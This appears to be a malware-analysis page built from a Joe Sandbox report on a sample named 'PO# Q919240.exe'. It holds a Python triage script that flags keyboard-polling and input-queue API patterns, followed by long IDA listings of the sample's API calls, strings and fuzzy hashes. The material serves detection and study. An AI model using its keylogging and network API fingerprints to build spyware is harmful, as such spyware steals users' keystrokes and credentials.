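                The function summaries in this section give only an import name, its module, the visible arguments and the call site, which makes the report slow to triage by eye. The Python below is an added example written for this page, not code from the Joe Sandbox report or its IDA plugin: it parses that block format (bullet lines of "API.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function", followed by the Similarity fields, with Instruction Fuzzy Hash closing each block) and flags the two API combinations that appear in the blocks above, repeated GetAsyncKeyState/GetKeyState polling with the virtual-key codes decoded, and AttachThreadInput paired with GetForegroundWindow. The sample text is a constructed condensation of the GetAsyncKeyState and AttachThreadInput blocks on this page. One caveat a reviewer would want: the AU3_FreeVar string listed earlier in this section suggests these functions belong to an embedded AutoIt runtime, whose GUI and hotkey support polls key state and attaches input queues for legitimate reasons, so a hit from this triage is a lead to correlate with the injection and credential-theft signatures in the report header, not proof on its own.

```python
"""Triage Joe Sandbox 'Similarity' function blocks by their API fingerprint (added example)."""
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample input: two function blocks condensed from this report's format.
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 0044480E
• GetAsyncKeyState.USER32(000000A0), ref: 00444899
• GetKeyState.USER32(000000A0), ref: 004448AA
• GetAsyncKeyState.USER32(00000011), ref: 004448F5
• GetAsyncKeyState.USER32(0000005B), ref: 00444949
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
APIs
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
"""

# "• API.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function X:".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9_]+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)"
)
# Similarity fields worth keeping; the instruction fuzzy hash is the last line of a block.
FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Instruction Fuzzy Hash):\s*(?P<val>.*)$"
)
# Windows virtual-key codes seen as GetAsyncKeyState/GetKeyState arguments above.
VK_NAMES = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
KEY_APIS = {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState"}


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    subcall: bool  # True when the report attributes the call to a callee


@dataclass
class Block:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)


def parse_blocks(text):
    """Split report text into function blocks, one per Instruction Fuzzy Hash line."""
    blocks, cur = [], Block()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"] is not None))
            continue
        f = FIELD_RE.match(line)
        if f:
            cur.fields[f["key"]] = f["val"].strip()
            if f["key"] == "Instruction Fuzzy Hash":
                blocks.append(cur)
                cur = Block()
    return blocks


def triage(block):
    """Return (label, detail) findings for the API combinations seen in this report."""
    names = Counter(c.api for c in block.calls if not c.subcall)
    findings = []
    key_calls = [c for c in block.calls if c.api in KEY_APIS]
    if len(key_calls) >= 3:
        # Decode literal hex arguments; "?" marks an argument IDA could not resolve.
        keys = sorted({VK_NAMES.get(int(a, 16), "0x%02X" % int(a, 16))
                       for c in key_calls for a in c.args if a != "?"})
        findings.append(("keyboard-state polling", keys))
    if "AttachThreadInput" in names and "GetForegroundWindow" in names:
        findings.append(("input-queue attach to foreground window thread",
                         ["AttachThreadInput x%d" % names["AttachThreadInput"]]))
    com_resolvers = {"CLSIDFromProgID", "CLSIDFromString"} & set(names)
    if "CoCreateInstance" in names and com_resolvers:
        findings.append(("late-bound COM object creation", sorted(com_resolvers)))
    return findings


def report(text):
    """(API ID, fuzzy-hash prefix, findings) for every block that triggers a rule."""
    out = []
    for b in parse_blocks(text):
        f = triage(b)
        if f:
            out.append((b.fields.get("API ID", ""), b.fields.get("Instruction Fuzzy Hash", "")[:16], f))
    return out


if __name__ == "__main__":
    for api_id, fh, findings in report(SAMPLE):
        print(api_id, fh)
        for label, detail in findings:
            print("  -", label, detail)
```

                Running it over the full report text instead of SAMPLE works unchanged, because the parser keys on the bullet lines and ignores the Memory Dump Source and Joe Sandbox IDA Plugin lines; the fuzzy-hash prefix in each result is what you would pivot on to find the same function in other samples.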
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                • API String ID: 0-1603158881
                • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                APIs
                • CreateMenu.USER32 ref: 00448603
                • SetMenu.USER32(?,00000000), ref: 00448613
                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                • IsMenu.USER32(?), ref: 004486AB
                • CreatePopupMenu.USER32 ref: 004486B5
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                • DrawMenuBar.USER32 ref: 004486F5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                • String ID: 0
                • API String ID: 161812096-4108050209
                • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                APIs
                • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\PO# Q919240.exe), ref: 00434057
                • LoadStringW.USER32(00000000), ref: 00434060
                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                • LoadStringW.USER32(00000000), ref: 00434078
                • _wprintf.LIBCMT ref: 004340A1
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                Strings
                • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                • C:\Users\user\Desktop\PO# Q919240.exe, xrefs: 00434040
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: HandleLoadModuleString$Message_wprintf
                • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\PO# Q919240.exe
                • API String ID: 3648134473-3217746438
                APIs
                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO# Q919240.exe,0040F545,C:\Users\user\Desktop\PO# Q919240.exe,004A90E8,C:\Users\user\Desktop\PO# Q919240.exe,?,0040F545), ref: 0041013C
                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                • MoveFileW.KERNEL32(?,?), ref: 00453932
                Similarity
                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                • String ID:
                • API String ID: 978794511-0
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                Similarity
                • API ID: _memmove$_memcmp
                • String ID: '$\$h
                • API String ID: 2205784470-1303700344
                APIs
                • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                • VariantClear.OLEAUT32 ref: 0045EA6D
                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                • __swprintf.LIBCMT ref: 0045EC33
                • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                Strings
                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                Similarity
                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                • String ID: %4d%02d%02d%02d%02d%02d
                • API String ID: 2441338619-1568723262
                APIs
                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                • Sleep.KERNEL32(0000000A), ref: 0042C67F
                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                Similarity
                • API ID: Interlocked$DecrementIncrement$Sleep
                • String ID: @COM_EVENTOBJ
                • API String ID: 327565842-2228938565
                APIs
                • VariantClear.OLEAUT32(?), ref: 0047031B
                • VariantClear.OLEAUT32(?), ref: 0047044F
                • VariantInit.OLEAUT32(?), ref: 004704A3
                • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                • VariantClear.OLEAUT32(?), ref: 00470516
                  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                • VariantClear.OLEAUT32(00000000), ref: 0047060D
                Similarity
                • API ID: Variant$Clear$Copy$CallDispFuncInit
                • String ID: H
                • API String ID: 3613100350-2852464175
                APIs
                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                • DestroyWindow.USER32(?), ref: 00426F50
                • UnregisterHotKey.USER32(?), ref: 00426F77
                • FreeLibrary.KERNEL32(?), ref: 0042701F
                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                Similarity
                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                • String ID: close all
                • API String ID: 4174999648-3243417748
                APIs
                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                Similarity
                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                • String ID:
                • API String ID: 1291720006-3916222277
                APIs
                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                • IsMenu.USER32(?), ref: 0045FC5F
                • CreatePopupMenu.USER32 ref: 0045FC97
                • GetMenuItemCount.USER32(?), ref: 0045FCFD
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                Similarity
                • API ID: Menu$Item$CountCreateInfoInsertPopup
                • String ID: 0$2
                • API String ID: 93392585-3793063076
                APIs
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                • VariantClear.OLEAUT32(?), ref: 00435320
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                • VariantClear.OLEAUT32(?), ref: 004353B3
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                Similarity
                • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                • String ID: crts
                • API String ID: 586820018-3724388283
                APIs
                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO# Q919240.exe,0040F545,C:\Users\user\Desktop\PO# Q919240.exe,004A90E8,C:\Users\user\Desktop\PO# Q919240.exe,?,0040F545), ref: 0041013C
                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                • _wcscat.LIBCMT ref: 0044BCAF
                • _wcslen.LIBCMT ref: 0044BCBB
                • _wcslen.LIBCMT ref: 0044BCD1
                • SHFileOperationW.SHELL32(?), ref: 0044BD17
                Similarity
                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                • String ID: \*.*
                • API String ID: 2326526234-1173974218
                APIs
                  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                • _wcslen.LIBCMT ref: 004335F2
                • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                • GetLastError.KERNEL32 ref: 0043362B
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                • _wcsrchr.LIBCMT ref: 00433666
                  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                Similarity
                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                • String ID: \
                • API String ID: 321622961-2967466578
                • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsnicmp
                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                • API String ID: 1038674560-2734436370
                • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                • __lock.LIBCMT ref: 00417981
                  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                • __lock.LIBCMT ref: 004179A2
                • ___addlocaleref.LIBCMT ref: 004179C0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                • String ID: KERNEL32.DLL$pI
                • API String ID: 637971194-197072765
                • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove$_malloc
                • String ID:
                • API String ID: 1938898002-0
                • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                APIs
                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                • _memmove.LIBCMT ref: 0044B555
                • _memmove.LIBCMT ref: 0044B578
                • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                • String ID:
                • API String ID: 2737351978-0
                • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                APIs
                • ___set_flsgetvalue.LIBCMT ref: 0041523A
                • __calloc_crt.LIBCMT ref: 00415246
                • __getptd.LIBCMT ref: 00415253
                • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                • _free.LIBCMT ref: 0041529E
                • __dosmaperr.LIBCMT ref: 004152A9
                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                • String ID:
                • API String ID: 3638380555-0
                • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                APIs
                • VariantInit.OLEAUT32(?), ref: 0046C96E
                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Variant$Copy$ClearErrorInitLast
                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                • API String ID: 3207048006-625585964
                • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                APIs
                • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                • gethostbyname.WSOCK32(?), ref: 004655A6
                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                • _memmove.LIBCMT ref: 004656CA
                • GlobalFree.KERNEL32(00000000), ref: 0046575C
                • WSACleanup.WSOCK32 ref: 00465762
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
